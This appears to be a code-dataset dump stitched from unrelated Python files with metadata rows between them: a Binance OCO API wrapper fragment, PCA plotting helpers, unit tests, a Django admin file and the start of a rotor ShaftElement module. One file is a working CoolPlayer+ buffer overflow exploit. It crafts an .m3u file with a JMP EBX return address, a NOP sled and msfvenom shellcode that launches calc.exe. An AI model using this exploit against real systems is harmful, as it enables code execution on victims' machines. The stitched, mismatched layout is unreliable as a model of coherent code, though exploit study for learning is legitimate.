    orderListId (Optional[float]):
        The Id of the order list to cancel.
    listClientOrderId (Optional[str]):
        A unique Id for the entire orderList.
    newClientOrderId (Optional[str]):
        Used to uniquely identify this cancel.
    recvWindow (int):
        Time window in milliseconds to execute the order.
        The value cannot be greater than 60000.
        Defaults to 5000.
    Returns
    -------
    (Dict[str, List[dict]])
        Information related to the cancellation of the overall OCO
        order (orderListId, contingencyType, list status fields,
        transactionTime, symbol), an `orders` list naming each leg and
        an `orderReports` list detailing each cancelled leg.
    """
    return delete(
        self._url,
        'orderList',
        key=self.__key,
        secret=self.__secret,
        # Upper-cased for consistency: every other endpoint in this
        # class normalises the symbol with `.upper()`.
        symbol=symbol.upper(),
        orderListId=orderListId,
        listClientOrderId=listClientOrderId,
        newClientOrderId=newClientOrderId,
        recvWindow=recvWindow
    )
def allOrderList(
    self,
    fromId: Optional[str] = None,
    startTime: Optional[Union[str, date, datetime]] = None,
    endTime: Optional[Union[str, date, datetime]] = None,
    limit: Optional[int] = None,
    recvWindow: int = 5000
) -> dict:
    """
    Retrieve all OCO based on provided optional parameters.
    Weight: 10
    Data Source: Database
    Other info
    ----------
    If `fromId` is supplied, neither `startTime` nor `endTime` can be
    provided.
    Parameters
    ----------
    fromId (Optional[str]):
        The Id of the OCO to start from, i.e. `fromId` should
        reference an order older than now.
    startTime (Optional[Union[str, date, datetime]]):
        TODO: confirm if time is expressed in ms
        Optional: The point in history to get data from.
    endTime (Optional[Union[str, date, datetime]]):
        TODO: confirm if time is expressed in ms
        Optional: The point in history to get data to.
    limit (Optional[int]):
        Optional: The number of trades to get starting from
        now - `limit`
        Example: if `limit` is set to 10 the API will return
        the 10 previous trades.
    recvWindow (int):
        Number of milliseconds in which to complete the transaction.
        If timeout, transaction is being cancelled.
        Defaults to 5000.
    Returns
    -------
    (List[dict])
        A list of all OCO orders for the given parameters; each record
        holds orderListId, contingencyType, list status fields,
        transactionTime, symbol and an `orders` list naming each leg,
        e.g.:-
        [
            {
                'orderListId': 4921,
                'contingencyType': 'OCO',
                'listStatusType': 'ALL_DONE',
                'listOrderStatus': 'ALL_DONE',
                'listClientOrderId': 'vngnEJ8Zdy8XF0lhwTgux3',
                'transactionTime': 1622389489116,
                'symbol': 'BTCUSDT',
                'orders': [
                    {
                        'symbol': 'BTCUSDT',
                        'orderId': 5729322,
                        'clientOrderId': 'J1Pe3pq2LAPCgPiffgDbSl'
                    },
                    {
                        'symbol': 'BTCUSDT',
                        'orderId': 5729323,
                        'clientOrderId': 'JCgR0zZitgIf5PYXucdS3h'
                    }
                ]
            }
        ]
    """
    return get(
        self._url,
        'allOrderList',
        key=self.__key,
        secret=self.__secret,
        fromId=fromId,
        startTime=startTime,
        endTime=endTime,
        limit=limit,
        recvWindow=recvWindow
    )
def orderList(
    self,
    orderListId: Optional[int] = None,
    origClientOrderId: Optional[str] = None,
    recvWindow: int = 5000
) -> dict:
    """
    Retrieve a specific OCO based on provided optional parameters.
    Weight: 2
    Data Source: Database
    Other info
    ----------
    Either `orderListId` or `origClientOrderId` must be provided.
    Parameters
    ----------
    orderListId (Optional[int]):
        The Id of the OCO order.
    origClientOrderId (Optional[str]):
        The corresponding order id generated at time of order.
    recvWindow (int):
        Number of milliseconds in which to complete the transaction.
        If timeout, transaction is being cancelled.
        Defaults to 5000.
    Returns
    -------
    (dict)
        The OCO order for the given Id, e.g.:-
        {
            'orderListId': 4922,
            'contingencyType': 'OCO',
            'listStatusType': 'ALL_DONE',
            'listOrderStatus': 'ALL_DONE',
            'listClientOrderId': 'PLNwO0VkIhqTaOyTbjzMJt',
            'transactionTime': 1622390178451,
            'symbol': 'BTCUSDT',
            'orders': [
                {
                    'symbol': 'BTCUSDT',
                    'orderId': 5730856,
                    'clientOrderId': 'aRVtxZ0ytCpU5vbRSagtS1'
                },
                {
                    'symbol': 'BTCUSDT',
                    'orderId': 5730857,
                    'clientOrderId': 'cNhPm3TRaLEmqTrAHXq1wL'
                }
            ]
        }
    """
    return get(
        self._url,
        'orderList',
        key=self.__key,
        secret=self.__secret,
        orderListId=orderListId,
        origClientOrderId=origClientOrderId,
        recvWindow=recvWindow
    )
def openOrderList(
    self,
    recvWindow: int = 5000
) -> dict:
    """
    Retrieve all open OCO orders.
    Weight: 3
    Data Source: Database
    Parameters
    ----------
    recvWindow (int):
        Number of milliseconds in which to complete the transaction;
        on timeout the transaction is cancelled. Defaults to 5000.
    Returns
    -------
    (List[dict])
        One record per open OCO order (orderListId, contingencyType,
        list status fields, transactionTime, symbol and an `orders`
        list naming each leg).
    """
    credentials = dict(
        key=self.__key,
        secret=self.__secret,
    )
    return get(
        self._url,
        'openOrderList',
        recvWindow=recvWindow,
        **credentials
    )
# Drop the typing/datetime helper names from the module namespace; the
# idiomatic form is `del a, b`, not `del (a, b)`.
del Literal, Optional, date, datetime
| 35.00365
| 98
| 0.483224
| 3,999
| 47,955
| 5.750688
| 0.117279
| 0.018089
| 0.016524
| 0.012784
| 0.792669
| 0.756577
| 0.740749
| 0.716789
| 0.694569
| 0.658651
| 0
| 0.047769
| 0.430758
| 47,955
| 1,369
| 99
| 35.029218
| 0.794674
| 0.659222
| 0
| 0.698113
| 0
| 0
| 0.016968
| 0
| 0
| 0
| 0
| 0.020453
| 0
| 1
| 0.056604
| false
| 0
| 0.015094
| 0
| 0.128302
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
bc61540acf3ad8176467553f7582a9bedd85a42b
| 3,426
|
py
|
Python
|
coolplayer_plus/coolplayer_plus_bof.py
|
m1kemu/ExploitDev
|
4a51a6bc83577c619a626fe037a885e007ef3f31
|
[
"MIT"
] | null | null | null |
coolplayer_plus/coolplayer_plus_bof.py
|
m1kemu/ExploitDev
|
4a51a6bc83577c619a626fe037a885e007ef3f31
|
[
"MIT"
] | null | null | null |
coolplayer_plus/coolplayer_plus_bof.py
|
m1kemu/ExploitDev
|
4a51a6bc83577c619a626fe037a885e007ef3f31
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python
# Author: Michael Music
# Date: 6/11/2019
# Description: Coolplayer+ Buffer Overflow Exploit
# Exercise in BOFs following the securitysift guide
# Tested on Windows XP
# Notes: An abnormal shellcode location within ESP allows for creating ways of
# launching shellcode.
# App must be installed, launched at C:/
# m3u file must be located at C:/
# EIP at offset 260
# ESP at offset 264
# EDX at offset 0
# EBX at offset 0
# There is only around 250 bytes worth of spaces at ESP, so it's limited
# Can't fit shellcode in beginning of buffer (where EBX/EDX point), as EIP is at 260
# EBX points to much more space, around 10000 bytes
# Solution is to JMP EBX, launch custom JMP code to jump over EIP,ESP and into shellcode
# Exploit: [Custom JMP code - jump to nops][Junk][EIP - JMP EBX][nops][shellcode][Junk]
# Found a JMP EBX at 0x7c873c53 in kernel32.dll
# Buffer layout: [custom JMP code][junk to offset 260][EIP = JMP EBX][NOP sled][shellcode][padding]
custom_jmp = '\xCC' * 16          # placeholder for the custom jump-over code (INT3s)
junk = 'A' * (260 - 16)           # filler up to the EIP offset (260)
eip = '\x53\x3c\x87\x7c'          # JMP EBX @ 0x7c873c53 in kernel32.dll, little-endian
nops = '\x90' * 100               # NOP sled in front of the payload
shellcode = '\xCC' * 500          # INT3 placeholder; swap in `buf` below for a live payload
exploit_string = custom_jmp + junk + eip + nops + shellcode
exploit_string += 'A' * (10000 - len(exploit_string))  # pad to the full 10000-byte buffer
out = 'crash.m3u'
# msfvenom -p windows/exec CMD=calc.exe -b "\x00" -f python -e x86/alpha_mixed
buf = ""
buf += "\x89\xe2\xd9\xc9\xd9\x72\xf4\x5e\x56\x59\x49\x49\x49"
buf += "\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"
buf += "\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
buf += "\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
buf += "\x58\x50\x38\x41\x42\x75\x4a\x49\x39\x6c\x5a\x48\x6c"
buf += "\x42\x53\x30\x55\x50\x33\x30\x51\x70\x6e\x69\x4d\x35"
buf += "\x45\x61\x6b\x70\x55\x34\x6e\x6b\x66\x30\x34\x70\x6c"
buf += "\x4b\x42\x72\x54\x4c\x4e\x6b\x32\x72\x34\x54\x6c\x4b"
buf += "\x62\x52\x46\x48\x36\x6f\x4d\x67\x61\x5a\x34\x66\x64"
buf += "\x71\x59\x6f\x6c\x6c\x55\x6c\x53\x51\x31\x6c\x63\x32"
buf += "\x56\x4c\x51\x30\x69\x51\x78\x4f\x34\x4d\x77\x71\x68"
buf += "\x47\x79\x72\x4b\x42\x36\x32\x51\x47\x6e\x6b\x63\x62"
buf += "\x32\x30\x6e\x6b\x53\x7a\x65\x6c\x4e\x6b\x42\x6c\x62"
buf += "\x31\x30\x78\x4a\x43\x47\x38\x53\x31\x6e\x31\x66\x31"
buf += "\x6c\x4b\x46\x39\x71\x30\x55\x51\x6a\x73\x6e\x6b\x63"
buf += "\x79\x66\x78\x79\x73\x67\x4a\x31\x59\x6e\x6b\x55\x64"
buf += "\x6c\x4b\x66\x61\x79\x46\x55\x61\x39\x6f\x6c\x6c\x69"
buf += "\x51\x38\x4f\x34\x4d\x46\x61\x58\x47\x50\x38\x4d\x30"
buf += "\x52\x55\x68\x76\x66\x63\x61\x6d\x38\x78\x55\x6b\x53"
buf += "\x4d\x65\x74\x54\x35\x6b\x54\x42\x78\x6e\x6b\x72\x78"
buf += "\x34\x64\x35\x51\x59\x43\x73\x56\x4e\x6b\x76\x6c\x70"
buf += "\x4b\x6e\x6b\x72\x78\x47\x6c\x66\x61\x6e\x33\x4e\x6b"
buf += "\x74\x44\x4e\x6b\x53\x31\x48\x50\x6b\x39\x77\x34\x71"
buf += "\x34\x55\x74\x51\x4b\x61\x4b\x63\x51\x56\x39\x43\x6a"
buf += "\x50\x51\x59\x6f\x4b\x50\x61\x4f\x43\x6f\x51\x4a\x4c"
buf += "\x4b\x56\x72\x7a\x4b\x6e\x6d\x71\x4d\x33\x5a\x76\x61"
buf += "\x6c\x4d\x6b\x35\x6e\x52\x67\x70\x53\x30\x45\x50\x42"
buf += "\x70\x53\x58\x65\x61\x6c\x4b\x62\x4f\x4b\x37\x4b\x4f"
buf += "\x6a\x75\x4f\x4b\x6c\x30\x78\x35\x49\x32\x42\x76\x71"
buf += "\x78\x59\x36\x4f\x65\x4f\x4d\x6f\x6d\x39\x6f\x49\x45"
buf += "\x45\x6c\x64\x46\x63\x4c\x76\x6a\x6f\x70\x49\x6b\x49"
buf += "\x70\x51\x65\x67\x75\x4d\x6b\x77\x37\x35\x43\x31\x62"
buf += "\x50\x6f\x50\x6a\x75\x50\x42\x73\x49\x6f\x49\x45\x61"
buf += "\x73\x75\x31\x52\x4c\x51\x73\x66\x4e\x33\x55\x44\x38"
buf += "\x62\x45\x67\x70\x41\x41"
# BUG FIX: the original did `text.close` (missing parentheses), so the file
# handle was never explicitly closed. A context manager guarantees the
# write is flushed and the handle released.
with open(out, 'w') as m3u_file:
    m3u_file.write(exploit_string)
| 45.078947
| 88
| 0.689434
| 697
| 3,426
| 3.378766
| 0.27977
| 0.020382
| 0.02293
| 0.020382
| 0.016561
| 0.008917
| 0
| 0
| 0
| 0
| 0
| 0.269605
| 0.099241
| 3,426
| 75
| 89
| 45.68
| 0.493519
| 0.267367
| 0
| 0
| 0
| 0.723404
| 0.736039
| 0.719968
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
bc9dd9b8f6b9405ccfc1a0db9c2cce2bad705b34
| 21
|
py
|
Python
|
scripts/dummy.py
|
brettharder/nba_predictions
|
e3a0c2068599caa315387f6e91a9d958d8ed0b72
|
[
"MIT"
] | null | null | null |
scripts/dummy.py
|
brettharder/nba_predictions
|
e3a0c2068599caa315387f6e91a9d958d8ed0b72
|
[
"MIT"
] | null | null | null |
scripts/dummy.py
|
brettharder/nba_predictions
|
e3a0c2068599caa315387f6e91a9d958d8ed0b72
|
[
"MIT"
] | null | null | null |
####
### TESTING
###
| 5.25
| 11
| 0.333333
| 1
| 21
| 7
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.190476
| 21
| 3
| 12
| 7
| 0.411765
| 0.333333
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
bca2f169f9c644a01661e1cb5506a6ba324bfaf9
| 95
|
py
|
Python
|
ControlManual/src/utils/error.py
|
ZeroIntensity/ControlManual
|
9bd3e5eda22df70baa8a9bf324fd4efaacb924b2
|
[
"MIT"
] | 1
|
2021-12-20T18:07:50.000Z
|
2021-12-20T18:07:50.000Z
|
ControlManual/src/utils/error.py
|
ZeroIntensity/ControlManual
|
9bd3e5eda22df70baa8a9bf324fd4efaacb924b2
|
[
"MIT"
] | 16
|
2021-12-20T19:07:07.000Z
|
2021-12-27T21:03:48.000Z
|
ControlManual/src/utils/error.py
|
ZeroIntensity/ControlManual
|
9bd3e5eda22df70baa8a9bf324fd4efaacb924b2
|
[
"MIT"
] | 1
|
2021-12-19T19:41:11.000Z
|
2021-12-19T19:41:11.000Z
|
from ..console import console
def error(message: str) -> None:
    """Report *message* as an error via the shared console object.

    Thin delegating wrapper around ``console.error``; adds no behavior
    of its own.
    """
    console.error(message)
| 19
| 33
| 0.684211
| 12
| 95
| 5.416667
| 0.666667
| 0.369231
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.2
| 95
| 4
| 34
| 23.75
| 0.855263
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 5
|
bca5f432dc757e49f7c6ba06c9da9e25224e81a8
| 1,772
|
py
|
Python
|
mriqc/reports/tests/test_reports.py
|
cbinyu/mriqc
|
471d7bb8a6f1611bec813fd62175ea74494552af
|
[
"BSD-3-Clause"
] | null | null | null |
mriqc/reports/tests/test_reports.py
|
cbinyu/mriqc
|
471d7bb8a6f1611bec813fd62175ea74494552af
|
[
"BSD-3-Clause"
] | null | null | null |
mriqc/reports/tests/test_reports.py
|
cbinyu/mriqc
|
471d7bb8a6f1611bec813fd62175ea74494552af
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
#
# @Author: oesteban
# @Date: 2016-01-05 11:33:39
# @Email: code@oscaresteban.es
"""Test utils"""
from __future__ import print_function, division, absolute_import, unicode_literals
# import os.path as op
# import pytest
# from io import open # pylint: disable=W0622
# from mriqc.reports.utils import check_reports
# @pytest.fixture(scope='session')
# @pytest.mark.parametrize("dataset,reports,expected", [
# ({'t1w': ['/data/bidsroot/sub-06/anat/sub-06_T1w.nii.gz',
# '/data/bidsroot/sub-11/anat/sub-11_T1w.nii.gz',
# '/data/bidsroot/sub-05/anat/sub-05_T1w.nii.gz',
# '/data/bidsroot/sub-13/anat/sub-13_T1w.nii.gz'],
# 'func': ['/data/bidsroot/sub-09/func/sub-09_task-rhymejudgment_bold.nii.gz',
# '/data/bidsroot/sub-03/func/sub-03_task-rhymejudgment_bold.nii.gz',
# '/data/bidsroot/sub-06/func/sub-06_task-rhymejudgment_bold.nii.gz']},
# ['anatomical_sub-05_ses-default-session_run-default-run_report.html',
# 'anatomical_sub-06_ses-default-session_run-default-run_report.html',
# 'anatomical_sub-13_ses-default-session_run-default-run_report.html',
# 'functional_sub-06_ses-default_session_task-rhymejudgment_run-default_run_report.html'])
# ])
# def test_check_reports(tmpdir_factory, dataset, reports):
# out_folder = tmpdir_factory.mktemp('reports')
# for rname in reports:
# open(op.join(out_folder, rname), 'a').close()
# settings = {'reports_dir': out_folder,
# 'bids_dir': '/data/bidsroot'}
# check_reports(dataset, settings)
# assert True
| 44.3
| 96
| 0.671558
| 250
| 1,772
| 4.572
| 0.42
| 0.08399
| 0.091864
| 0.074366
| 0.32371
| 0.259843
| 0.199475
| 0.199475
| 0.092738
| 0.092738
| 0
| 0.043185
| 0.163657
| 1,772
| 39
| 97
| 45.435897
| 0.72807
| 0.909142
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 1
|
0
| 5
|
bcff05c10b2aa1d09ec4271fdda76ad3e38e2681
| 3,844
|
py
|
Python
|
uk_biobank/DeGAs/src/py/rivas_decomposition_py/plot_pca.py
|
bschilder/public-resources
|
54c129cc27f17d36ff512987659a20eebaa4f0da
|
[
"MIT"
] | null | null | null |
uk_biobank/DeGAs/src/py/rivas_decomposition_py/plot_pca.py
|
bschilder/public-resources
|
54c129cc27f17d36ff512987659a20eebaa4f0da
|
[
"MIT"
] | null | null | null |
uk_biobank/DeGAs/src/py/rivas_decomposition_py/plot_pca.py
|
bschilder/public-resources
|
54c129cc27f17d36ff512987659a20eebaa4f0da
|
[
"MIT"
] | null | null | null |
import os, logging, collections
import numpy as np
import matplotlib
import matplotlib.pyplot as plt
import matplotlib.gridspec as gridspec
from logging.config import dictConfig
from logging import getLogger
# Root-logger configuration: everything at DEBUG and above goes to a
# StreamHandler using a timestamped "name/level/message" format.
_LOG_CONFIG = {
    'version': 1,
    'formatters': {
        'f': {'format': '%(asctime)s %(name)-12s %(levelname)-8s %(message)s'},
    },
    'handlers': {
        'h': {
            'class': 'logging.StreamHandler',
            'formatter': 'f',
            'level': logging.DEBUG,
        },
    },
    'root': {'handlers': ['h'], 'level': logging.DEBUG},
}
dictConfig(_LOG_CONFIG)
logger = getLogger('plot_pca')
def plot_pca_phe(
    d, pc_index1, pc_index2,
    figsize=(12, 12),
    flip_xaxis=False, flip_yaxis=False,
    save=None, save_exts=('pdf', 'png'),
):
    """Scatter plot of the phenotype projections on two principal components.

    Parameters
    ----------
    d:
        Decomposition data object; must provide ``plot_data_pca_phe``.
    pc_index1, pc_index2:
        Indices of the two principal components to plot against each other.
    figsize:
        Matplotlib figure size ``(width, height)`` in inches.
    flip_xaxis, flip_yaxis:
        When True, mirror the corresponding axis.
    save:
        Output basename (without extension), or None to skip saving.
        Missing parent directories are created.
    save_exts:
        File extensions to save under. Default changed from a mutable
        list to a tuple (mutable-default pitfall); callers may still
        pass a list.
    """
    # prepare data
    plot_d_phe = d.plot_data_pca_phe(pc_index1, pc_index2)
    plot_ds = [plot_d_phe]
    # prepare fig grid
    fig = plt.figure(figsize=figsize)
    gs = gridspec.GridSpec(1, 1)
    fig_axs = [fig.add_subplot(sp) for sp in gs]
    for ax, plot_d in zip(fig_axs, plot_ds):
        ax.set_aspect('equal')
        ax.scatter(
            plot_d['x'], plot_d['y'],
            marker='x', s=(15 ** 2),
            color='blue'
        )
        # Symmetric limits: 1.1x the largest |coordinate| on either axis.
        ax_max = 1.1 * np.max([plot_d['x'], -plot_d['x'], plot_d['y'], -plot_d['y']])
        if flip_xaxis:
            ax.set_xlim([ax_max, -ax_max])
        else:
            ax.set_xlim([-ax_max, ax_max])
        if flip_yaxis:
            ax.set_ylim([ax_max, -ax_max])
        else:
            ax.set_ylim([-ax_max, ax_max])
    gs.tight_layout(fig, rect=[0, 0, 1, 1])
    # save to file
    if save is not None:
        for ext in save_exts:
            tmp_save_file = '{}.{}'.format(save, ext)
            if not os.path.exists(os.path.dirname(tmp_save_file)):
                os.makedirs(os.path.dirname(tmp_save_file))
            logger.info('saving the image to {}'.format(tmp_save_file))
            fig.savefig(tmp_save_file, bbox_inches="tight", pad_inches=0.0)
def plot_pca(
    d, pc_index1, pc_index2,
    figsize=(12, 6),
    flip_xaxis=False, flip_yaxis=False,
    save=None, save_exts=('pdf', 'png'),
):
    """Side-by-side scatter plots of phenotype and variant projections
    on two principal components.

    Parameters
    ----------
    d:
        Decomposition data object; must provide ``plot_data_pca_phe``
        and ``plot_data_pca_var``.
    pc_index1, pc_index2:
        Indices of the two principal components to plot against each other.
    figsize:
        Matplotlib figure size ``(width, height)`` in inches.
    flip_xaxis, flip_yaxis:
        When True, mirror the corresponding axis (applied to both panels).
    save:
        Output basename (without extension), or None to skip saving.
        Missing parent directories are created.
    save_exts:
        File extensions to save under. Default changed from a mutable
        list to a tuple (mutable-default pitfall); callers may still
        pass a list.
    """
    # prepare data: one panel for phenotypes, one for variants
    plot_d_phe = d.plot_data_pca_phe(pc_index1, pc_index2)
    plot_d_var = d.plot_data_pca_var(pc_index1, pc_index2)
    plot_ds = [plot_d_phe, plot_d_var]
    # prepare fig grid
    fig = plt.figure(figsize=figsize)
    gs = gridspec.GridSpec(1, 2)
    fig_axs = [fig.add_subplot(sp) for sp in gs]
    for ax, plot_d in zip(fig_axs, plot_ds):
        ax.set_aspect('equal')
        ax.scatter(
            plot_d['x'], plot_d['y'],
            marker='x', s=(15 ** 2),
            color='blue',
        )
        ax.set_title(plot_d['title'])
        ax.set_xlabel(plot_d['xlabel'])
        ax.set_ylabel(plot_d['ylabel'])
        # Symmetric limits: 1.1x the largest |coordinate| on either axis.
        ax_max = 1.1 * np.max([plot_d['x'], -plot_d['x'], plot_d['y'], -plot_d['y']])
        if flip_xaxis:
            ax.set_xlim([ax_max, -ax_max])
        else:
            ax.set_xlim([-ax_max, ax_max])
        if flip_yaxis:
            ax.set_ylim([ax_max, -ax_max])
        else:
            ax.set_ylim([-ax_max, ax_max])
    gs.tight_layout(fig, rect=[0, 0, 1, 1])
    # save to file
    if save is not None:
        for ext in save_exts:
            tmp_save_file = '{}.{}'.format(save, ext)
            if not os.path.exists(os.path.dirname(tmp_save_file)):
                os.makedirs(os.path.dirname(tmp_save_file))
            logger.info('saving the image to {}'.format(tmp_save_file))
            fig.savefig(tmp_save_file, bbox_inches="tight", pad_inches=0.0)
| 32.033333
| 90
| 0.559573
| 548
| 3,844
| 3.686131
| 0.218978
| 0.056931
| 0.054455
| 0.039604
| 0.762376
| 0.762376
| 0.762376
| 0.736634
| 0.736634
| 0.716832
| 0
| 0.017318
| 0.293965
| 3,844
| 120
| 91
| 32.033333
| 0.726971
| 0.05359
| 0
| 0.644444
| 0
| 0
| 0.068176
| 0.005796
| 0
| 0
| 0
| 0
| 0
| 1
| 0.022222
| false
| 0
| 0.077778
| 0
| 0.1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
4c22cfb1dfdbdfacb56df6760b38329c83b344d5
| 1,757
|
py
|
Python
|
teszt/test_feladat03.py
|
python-feladatok-tesztekkel/06-01-01-stringek-for-betu
|
e73a028d757d330837602d58e6e03d343d92b309
|
[
"CC0-1.0"
] | null | null | null |
teszt/test_feladat03.py
|
python-feladatok-tesztekkel/06-01-01-stringek-for-betu
|
e73a028d757d330837602d58e6e03d343d92b309
|
[
"CC0-1.0"
] | null | null | null |
teszt/test_feladat03.py
|
python-feladatok-tesztekkel/06-01-01-stringek-for-betu
|
e73a028d757d330837602d58e6e03d343d92b309
|
[
"CC0-1.0"
] | null | null | null |
from unittest import TestCase
import os,sys,inspect
# Make the package under test importable: prepend the parent of this
# test file's directory to sys.path.
_this_file = inspect.getfile(inspect.currentframe())
current_dir = os.path.dirname(os.path.abspath(_this_file))
parent_dir = os.path.dirname(current_dir)
sys.path.insert(0, parent_dir)
import feladatok
class Megszamol(TestCase):
    """Tests for feladatok.megszamol: case-sensitive counting of a letter
    in a sentence."""

    def _check(self, keresett, mondat, elvart):
        # Shared assertion helper: the five test cases previously
        # duplicated these four lines verbatim.
        aktualis = feladatok.megszamol(keresett, mondat)
        self.assertEqual(elvart, aktualis, "Rosszul határozta meg, hogy a(z) "+str(keresett)+" betű hányszor szerepel a mondatban: "+mondat)

    def test_feladat01(self):
        self._check('e', "Nincs", 0)

    def test_feladat02(self):
        self._check('E', "Nincs", 0)

    def test_feladat03(self):
        self._check('E', "Nincs a betű", 1)

    def test_feladat04(self):
        self._check('e', "Nincs a betű", 1)

    def test_feladat05(self):
        self._check('e', "eaea eaea EAEA EAEA eaeaa mondatban: ", 10)
| 42.853659
| 140
| 0.677291
| 212
| 1,757
| 5.570755
| 0.235849
| 0.029636
| 0.055038
| 0.08044
| 0.739204
| 0.739204
| 0.700254
| 0.700254
| 0.700254
| 0.700254
| 0
| 0.012266
| 0.211155
| 1,757
| 40
| 141
| 43.925
| 0.839827
| 0
| 0
| 0.621622
| 0
| 0
| 0.242597
| 0
| 0
| 0
| 0
| 0
| 0.135135
| 1
| 0.135135
| false
| 0
| 0.081081
| 0
| 0.243243
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
4c2f4bdea96dc4b5c39bc8970a427679b9030377
| 143
|
py
|
Python
|
backend-project/small_eod/features/admin.py
|
kostyrko/small_eod
|
c12fe36f2233bdd297d32d61d9cd25ddbfca897b
|
[
"MIT"
] | 1
|
2021-02-10T19:58:51.000Z
|
2021-02-10T19:58:51.000Z
|
backend-project/small_eod/features/admin.py
|
kostyrko/small_eod
|
c12fe36f2233bdd297d32d61d9cd25ddbfca897b
|
[
"MIT"
] | null | null | null |
backend-project/small_eod/features/admin.py
|
kostyrko/small_eod
|
c12fe36f2233bdd297d32d61d9cd25ddbfca897b
|
[
"MIT"
] | 1
|
2021-02-10T19:38:35.000Z
|
2021-02-10T19:38:35.000Z
|
# Django admin wiring for the "features" app.
from django.contrib import admin

from .models import Feature, FeatureOption

# Register both models with the default ModelAdmin so they are editable
# in the admin site; no custom admin options are defined.
admin.site.register(Feature)
admin.site.register(FeatureOption)
| 17.875
| 42
| 0.825175
| 18
| 143
| 6.555556
| 0.555556
| 0.152542
| 0.288136
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.097902
| 143
| 7
| 43
| 20.428571
| 0.914729
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 5
|
4c4a5c3022a88438c8dfcd95acaa5de353cd0c70
| 76,616
|
py
|
Python
|
ross/shaft_element.py
|
startup0820/ross
|
44a3b2504e15c9ba9952a62ad6be828ef594f55a
|
[
"MIT"
] | 1
|
2021-07-20T04:24:19.000Z
|
2021-07-20T04:24:19.000Z
|
ross/shaft_element.py
|
startup0820/ross
|
44a3b2504e15c9ba9952a62ad6be828ef594f55a
|
[
"MIT"
] | null | null | null |
ross/shaft_element.py
|
startup0820/ross
|
44a3b2504e15c9ba9952a62ad6be828ef594f55a
|
[
"MIT"
] | null | null | null |
"""Shaft Element module.
This module defines the ShaftElement classes which will be used to represent the rotor
shaft. There're 2 options, an element with 8 or 12 degrees of freedom.
"""
import inspect
import os
from pathlib import Path
import numpy as np
import toml
from plotly import graph_objects as go
from ross.element import Element
from ross.materials import Material, steel
from ross.units import Q_, check_units
from ross.utils import read_table_file
__all__ = ["ShaftElement", "ShaftElement6DoF"]
class ShaftElement(Element):
r"""A shaft element.
This class will create a shaft element that may take into
account shear, rotary inertia an gyroscopic effects.
The matrices will be defined considering the following local
coordinate vector:
.. math::
[x_0, y_0, \alpha_0, \beta_0, x_1, y_1, \alpha_1, \beta_1]^T
Where :math:`\alpha_0` and :math:`\alpha_1` are the bending on the yz plane
